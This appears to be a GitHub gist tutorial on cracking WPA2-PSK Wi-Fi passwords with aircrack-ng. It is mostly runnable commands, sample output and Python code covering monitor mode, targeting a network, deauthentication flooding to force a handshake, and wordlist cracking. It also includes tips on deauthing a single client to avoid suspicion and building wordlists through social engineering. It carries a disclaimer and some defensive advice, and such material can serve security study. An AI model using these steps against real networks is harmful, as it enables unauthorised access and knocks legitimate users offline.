@MahmoodJamshidian
Last active March 17, 2023 11:56
Hack WiFi with AirCrack-NG

In this article, I am going to show you how to recover a Wi-Fi (WPA2-PSK) password using AirCrack-NG.

NOTE: The purpose of presenting this article is only for education and our goal is to improve the level of your network security knowledge. Any illegal use is the responsibility of the user and the author of this article does not accept any responsibility for illegal use.

Introduction:

In this tutorial, we will show you how to get the password of a wireless network; our goal is only to secure our own wireless network and the organization we work in.

One of the most important factors in the security of a wireless network is its password. All the attacks in this tutorial come down to the same thing: recovering the pre-shared key (the WPA/WPA2 passphrase) by guessing it. Therefore, in order to increase the security of our network, we must use a long, strong passphrase that is not in any wordlist. Of course, an attacker has another route besides hacking tools: social engineering, or even a combination of the two. You will see why this matters in the final password-cracking stage, where the quality of the wordlist decides whether the attack succeeds.

After reading this article, you should be able to:

  • Analyze the wireless networks around you
  • Disconnect (deauthenticate) clients from a wireless network
  • Capture frames in transit (wireless eavesdropping)
  • Crack the password of a wireless network from a captured handshake

Prerequisites:

  • A Linux operating system (Debian based: Kali Linux, Ubuntu, ...)
  • A wireless network card that supports monitor mode
  • Internet access to install the necessary packages (on Kali Linux and Parrot OS they are normally preinstalled, so no Internet access is required)
  • Basic knowledge of Linux

In the first step you need a Debian-based Linux operating system; if you use Kali Linux or Parrot OS you do not need Internet access. In order to analyze the networks around you, you need a network card that supports monitor mode (I will explain later how to find out whether your card supports it), and finally a little knowledge of Linux (just to better understand the commands).

NOTE: If you are using a virtual machine, the virtual network adapter the hypervisor gives the guest cannot be put into monitor mode. You need a USB wireless adapter that is passed through to the guest: in the VM settings, look for the USB devices (passthrough) option of your virtualization software and attach the adapter there.

Start of work

NOTE: In all these steps, if a command I give does not work for you and you get an error, search troubleshooting sites for your operating system.

  • Package Installation

    NOTE: If you are using Kali Linux or Parrot OS, or if the necessary packages are already installed, there is no need to do this step.

    NOTE: I am using Ubuntu 20.04 operating system. If the instructions for installing the packages do not work for you, you can search for the necessary instructions for your operating system on the Internet.

    Log in as the root user with the following command:

    $ sudo -i

    Install the aircrack-ng package:

    # apt update
    # apt install -y aircrack-ng

    If you do not encounter an error in this step, you can go to the next step

  • Setting up the wireless network card

    Connect your wireless network card to the device (if it is not built in).

    Then list the network interfaces with the iwconfig command:

    root@ubuntu:~# iwconfig
    lo        no wireless extensions.
    
    eno1      no wireless extensions.
    
    wlp3s0    IEEE 802.11  Mode:Master  Tx-Power=15 dBm   
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Power Management:on
    

    Note that with the predictable interface names most modern distributions use, wireless interfaces start with wl (for example wlan0 or wlp3s0); virtual interfaces can have any name.

    For example, I have a wireless network card named wlp3s0. Remember this name, we will use it a lot later.

    Currently, my network card is in Master mode (yours may be in another mode, such as Managed). In order to continue, we must put the network card into Monitor mode:

    # airmon-ng start [NETWORK-CARD-NAME]

    Replace [NETWORK-CARD-NAME] with the name of your network card.

    NOTE: NetworkManager and wpa_supplicant may keep switching the card back to Managed mode. If airmon-ng warns about interfering processes, stop them first with airmon-ng check kill (this drops your normal network connection until you start NetworkManager again at the end).

    After executing the above command, the name of your network card will usually change (for example wlp3s0 becomes wlp3s0mon), so check the name again with the iwconfig command and remember the new one.

    NOTE: If after executing the iwconfig command you see that your network card mode is still not Monitor, then your network card or its driver does not support monitor mode.

  • Analyzing the surrounding networks and capturing a handshake

    Use the following command to analyze nearby wireless networks:

    # airodump-ng [NETWORK-CARD-NAME]

    Output will look like this:

     CH  1 ][ Elapsed: 6 s ][ 2023-03-17 11:58 
     
     BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
     
     78:C3:E9:EB:AB:BE  -21       33        0    0  11   65   WPA2 CCMP   PSK  MJscript
     18:A6:F7:62:2C:67  -70       21        2    0   6  130   WPA2 CCMP   PSK  <length:  0>
     
     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
     
     D8:47:32:86:33:E8  86:40:4C:FE:A1:CB  -55    0e- 0e     0      283
     18:A6:F7:62:2C:67  EA:AA:AC:9E:22:C1  -68    0 - 0e     2        4

    The first table lists the access points (networks) and the second lists the clients (stations) together with the BSSID each one is associated with. We only need a few columns of the first table:

    • BSSID: MAC address of the access point
    • ESSID: The display name of the wireless network (if its value is <length: 0>, the network is hidden; its name will be revealed in the dump as soon as a client associates, because the client sends it unencrypted)
    • CH: The channel the network operates on

    The target of our attack is the MJscript wireless network. To capture only this network, we lock the card to its channel, filter on its BSSID and write everything to disk with the following command:

    # airodump-ng -c [WIFI-CHANNEL] -d [WIFI-BSSID] -w [OUTPUT-PATH] [NETWORK-CARD-NAME]

    Replace [WIFI-CHANNEL] with the CH column value, [WIFI-BSSID] with the BSSID column value (-d is the short form of --bssid), and [OUTPUT-PATH] with the output file prefix: airodump-ng appends -01.cap, -01.csv and so on to it.

    For example, it went like this for me:

    root@ubuntu:~# airodump-ng -c 11 -d 78:C3:E9:EB:AB:BE -w /home/ubuntu/wifi wlp3s0mon
     CH 11 ][ Elapsed: 6 s ][ 2023-03-17 12:36 
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
     78:C3:E9:EB:AB:BE  -20 100       81       95   38  11   65   WPA2 CCMP   PSK  MJscript
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
     78:C3:E9:EB:AB:BE  64:66:B3:1E:5B:A7  -38    0e-24   3123      106    

    This is the same as the previous two tables, with the difference that it only shows one network, and the captured frames are written to the path we gave it.

    The traffic of this network is now being recorded, but that alone does not give us the password: WPA2 encrypts data with per-session keys, and the only thing a password guess can be checked against is the 4-way handshake, the EAPOL exchange a client performs when it joins the network (we call this operation the handshake). The clients that are already connected completed their handshake before we started capturing. We could wait for a new client to connect, but that may take a long time, so we use another approach: with our adapter we send deauthentication frames that pretend to come from the access point, so the client is dropped from the network and reconnects, which repeats the handshake.

    NOTE: The terminal contains the previous command to dump the handshake and should not be closed, only close the process when the handshake is done.

    Next, open a new terminal and enter the following commands there.

    We can use the following command to send deauthentication frames to all clients of the network:

    # aireplay-ng --deauth 0 -a [WIFI-BSSID] [NETWORK-CARD-NAME]

    In the above command, an unlimited number of deauthentication bursts is sent to every client of that network (the card must be on the target's channel, which it is while airodump-ng is locked to that channel in the other terminal).

    But one question: isn't it suspicious if every client of a network is suddenly disconnected? We can instead work on only one of them, using the MAC address of the client from the STATION column of the second table; with the following command the operation is done on that client only:

    # aireplay-ng --deauth 0 -a [WIFI-BSSID] -c [CLIENT-STATION] [NETWORK-CARD-NAME]

    Replace [CLIENT-STATION] with the MAC address of the client.

    NOTE: The number zero means an unlimited number of bursts; you can change it to any number you want (a small number such as 5 is usually enough).

    After a few bursts have been sent, stop the process with Ctrl+C.

    A few seconds after you stop sending the deauthentication frames, the first line in the first terminal changes as follows:

     CH 11 ][ Elapsed: 12 s ][ 2023-03-17 13:42 ][ WPA handshake: 78:C3:E9:EB:AB:BE

    You can see that WPA handshake: 78:C3:E9:EB:AB:BE has been added to the end of the line. It means that a handshake for the 78:C3:E9:EB:AB:BE network was captured (it will of course show the BSSID of your own target network).

    Now the handshake we needed is there and you can close the network dump process.
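Besides the .cap file, airodump-ng -w also writes a PREFIX-01.csv file with the same two tables as the screen (access points, then stations). The following is an added example, not part of the original article, that parses that file to pick the channel, BSSID and associated clients of a target ESSID, which is exactly what the focused airodump-ng and the single-client aireplay-ng commands above need. The column layout is the one airodump-ng writes; the rows are constructed to mirror the article's screen output (the second AP is hidden, the second station is not associated).

```python
"""Parse the CSV that airodump-ng -w writes next to the .cap (added example, not the article's code).

The file has two comma-separated tables: access points, a blank line, then stations.
The column layout is the one airodump-ng writes; the rows below are CONSTRUCTED.
"""

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
78:C3:E9:EB:AB:BE, 2023-03-17 12:36:10, 2023-03-17 12:36:40,  11,  65, WPA2, CCMP, PSK, -20,       81,       95,   0.  0.  0.  0,   8, MJscript,
18:A6:F7:62:2C:67, 2023-03-17 12:36:10, 2023-03-17 12:36:40,   6, 130, WPA2, CCMP, PSK, -70,       21,        2,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
64:66:B3:1E:5B:A7, 2023-03-17 12:36:12, 2023-03-17 12:36:40, -38,      106, 78:C3:E9:EB:AB:BE,
EA:AA:AC:9E:22:C1, 2023-03-17 12:36:15, 2023-03-17 12:36:30, -68,        4, (not associated), Cafe-WiFi
"""


def parse_airodump_csv(text):
    """Return (aps, stations): aps keyed by BSSID, stations as a list of dicts."""
    aps, stations, section = {}, [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):          # header of the access-point table
            section = "ap"
            continue
        if line.startswith("Station MAC,"):    # header of the station table
            section = "sta"
            continue
        fields = [f.strip() for f in line.split(",")]
        if section == "ap" and len(fields) >= 15:
            # Columns 0..12 are fixed; ESSID may itself contain commas; the last column is Key.
            essid = ",".join(fields[13:-1])
            aps[fields[0]] = {
                "channel": int(fields[3]),
                "privacy": fields[5],
                "cipher": fields[6],
                "auth": fields[7],
                "power": int(fields[8]),
                "essid": essid,
                "hidden": essid == "",     # shown as <length: 0> on screen
            }
        elif section == "sta" and len(fields) >= 6:
            stations.append({
                "mac": fields[0],
                "power": int(fields[3]),
                "bssid": fields[5],        # "(not associated)" for roaming clients
                "probes": [p for p in fields[6:] if p],
            })
    return aps, stations


def target_and_clients(aps, stations, essid):
    """Return (bssid, channel, [client MACs]) for the named network, or None if it is absent."""
    for bssid, ap in aps.items():
        if ap["essid"] == essid:
            clients = [s["mac"] for s in stations if s["bssid"] == bssid]
            return bssid, ap["channel"], clients
    return None


def airodump_command(iface, bssid, channel, prefix):
    """Build the focused capture command from the article (--bssid is the long form of -d)."""
    return f"airodump-ng -c {channel} --bssid {bssid} -w {prefix} {iface}"


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    bssid, channel, clients = target_and_clients(aps, stations, "MJscript")
    print(airodump_command("wlp3s0mon", bssid, channel, "/home/ubuntu/wifi"))
    for mac in clients:
        print(f"aireplay-ng --deauth 5 -a {bssid} -c {mac} wlp3s0mon")
```

Hidden networks show up with an empty ESSID until a client associates, so re-parse the file after the deauthentication step if you need the name for the wordlist.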

  • Perform brute force on output files

    Before you can run the attack, you need a file with candidate passwords to test: the captured handshake only lets us check guesses offline, it does not reveal the password by itself.

    In the introduction I mentioned social engineering. Even if it does not give you the password directly, what you learn about the network and its owner (the network name, personal and company names, phone numbers, dates) can be turned into a targeted wordlist for that network, which greatly increases the chance that the password is in your list.

    If you do not have a wordlist and you want to generate one from a set of characters, you can do it with the following command:

    NOTE: This tool may not be installed; you can install it with the apt install crunch command.

    # crunch [MIN-SIZE] [MAX-SIZE] "[CHARACTERS]" > [OUTPUT-FILE]

    Replace [MIN-SIZE] with the minimum password length, [MAX-SIZE] with the maximum password length, [CHARACTERS] with the characters the password may contain, and [OUTPUT-FILE] with the file storage path.

    NOTE: WPA/WPA2 passphrases are between 8 and 63 characters long, so set [MIN-SIZE] to 8 or more.

    NOTE: Be realistic about the size of the list. Eight characters from the 95 printable ASCII characters already give 95^8 (about 6.6 x 10^15) candidates, which would need tens of petabytes of disk and is far beyond what aircrack-ng can test on a CPU (tens of thousands of keys per second, as in the output below). crunch is only practical for a small, well-chosen character set; an existing wordlist (on Kali Linux, for example, /usr/share/wordlists/rockyou.txt.gz) is the usual starting point.

    After creating the wordlist, you can crack the password with the following command:

    # aircrack-ng [CAP-FILE] -w [PASSLIST-FILE]

    Replace [CAP-FILE] with the .cap file written by the dump process and [PASSLIST-FILE] with the path of the wordlist. If the capture contains several networks, add -b [WIFI-BSSID] so that aircrack-ng knows which handshake to attack.

    If the password is found, you will see the following output:

    root@ubuntu:~# aircrack-ng /home/ubuntu/wifi-01.cap -w /home/ubuntu/passlist
                                   Aircrack-ng 1.6 
    
        [00:00:00] 2/2 keys tested (22.82 k/s) 
    
        Time left: --
    
                            KEY FOUND! [ 1234567890# ]
    
    
        Master Key     : B9 1B C6 AE 10 59 44 4A 4E CB EC D9 36 A3 79 86 
                         DE F8 EB CE 93 0B 22 D1 97 43 4F B5 FC C5 A5 B2 
    
        Transient Key  : AD 7D 3D 82 1A D2 CE 37 08 43 E9 4C 94 75 36 D7 
                         67 7D 48 A6 5F 70 77 CE 83 C9 63 BE C3 61 FC A7 
                         75 98 EB 09 B6 C1 B7 58 0F B6 0E 69 6F 81 60 5D 
                         29 FC 1C E6 35 B3 BF 77 2D 59 6C BF 50 6D 4A 85 
    
        EAPOL HMAC     : D4 BB C7 04 C7 C8 61 11 14 8B 3D 03 3B 04 28 E4 

    After these long steps, we finally managed to get the Wi-Fi password.
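To see what aircrack-ng is actually doing for each wordlist entry, and why the "Master Key", "Transient Key" and "EAPOL HMAC" lines appear in its output, here is an added example (not the article's code and not aircrack-ng's) that reimplements the WPA2-PSK check in plain Python: PBKDF2-HMAC-SHA1 of the passphrase with the ESSID gives the PMK (the Master Key), the 802.11i PRF expands it into the PTK (the Transient Key), and the first 16 bytes of the PTK verify the MIC of the handshake's EAPOL-Key frame (the EAPOL HMAC). The handshake it checks against is constructed, with fixed nonces and no key data; only the ESSID, BSSID and station MAC are taken from the article's capture. The same functions work on a real handshake if you feed them the nonces and message-2 frame pulled from the .cap file.

```python
"""Offline WPA2-PSK passphrase check in plain Python (added example, not the article's code).

Per candidate passphrase, exactly what aircrack-ng does:
  PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)      -> "Master Key"
  PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)) -> "Transient Key"
  MIC = HMAC-SHA1(KCK = PTK[0:16], EAPOL-Key frame with MIC field zeroed)[:16] -> "EAPOL HMAC"
A candidate is correct when the recomputed MIC equals the one in the captured frame.
The handshake below is CONSTRUCTED (fixed nonces, empty key data).
"""
import hashlib
import hmac

SAMPLE_SSID = "MJscript"                  # ESSID from the article's capture
AP_MAC = bytes.fromhex("78c3e9ebabbe")    # BSSID from the article's capture
STA_MAC = bytes.fromhex("6466b31e5ba7")   # station from the article's capture
# EAPOL hdr(4) + descriptor(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK derivation; the cost of these 4096 rounds is what limits aircrack-ng's speed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: four HMAC-SHA1 blocks over label || 0x00 || data || counter, cut to 64 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed 4-way-handshake message 2 (STA -> AP) with empty key data."""
    body = (
        b"\x02"                            # descriptor type: RSN key
        + (0x010A).to_bytes(2, "big")      # key info: MIC bit | pairwise | descriptor version 2
        + (16).to_bytes(2, "big")          # key length (CCMP)
        + (1).to_bytes(8, "big")           # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in msg 2)
        + mic
        + (0).to_bytes(2, "big")           # key data length
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 2, type EAPOL-Key


def crack(ssid, ap_mac, sta_mac, anonce, snonce, frame, candidates):
    """Return the first candidate that reproduces the captured MIC, or None if the list is exhausted."""
    captured = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    for cand in candidates:
        if not 8 <= len(cand) <= 63:       # WPA2-PSK passphrases are 8..63 characters; skip the rest
            continue
        kck = prf_512(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return cand
    return None


def build_sample_handshake(passphrase="1234567890#"):
    """Produce (anonce, snonce, frame) for a constructed handshake protected by the given passphrase."""
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = prf_512(pmk_from_passphrase(passphrase, SAMPLE_SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(snonce))
    return anonce, snonce, build_eapol_msg2(snonce, mic)


if __name__ == "__main__":
    anonce, snonce, frame = build_sample_handshake()
    wordlist = ["password", "12345678", "1234567890#"]   # constructed wordlist
    print("KEY FOUND:", crack(SAMPLE_SSID, AP_MAC, STA_MAC, anonce, snonce, frame, wordlist))
```

Two things to take from this: the check needs nothing from the network once the handshake is on disk, which is why the attack is offline, and every guess costs 4096 HMAC-SHA1 rounds bound to the ESSID, so a long random passphrase (and an unusual network name, which defeats precomputed tables) is the defence.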

  • Exit monitoring mode

    Enter the following command to exit monitor mode:

    # airmon-ng stop [NETWORK-CARD-NAME]

    If NetworkManager was stopped while you were working (airmon-ng check kill does this), start it again, for example with systemctl start NetworkManager, to get your normal connection back.

The End

Together we recovered the password of a wireless network offline, by capturing its WPA2 handshake and running a dictionary (brute-force) attack against it. My purpose with this training is only to raise your level of knowledge, and I hope you will pay attention to my warnings and not cause trouble :)
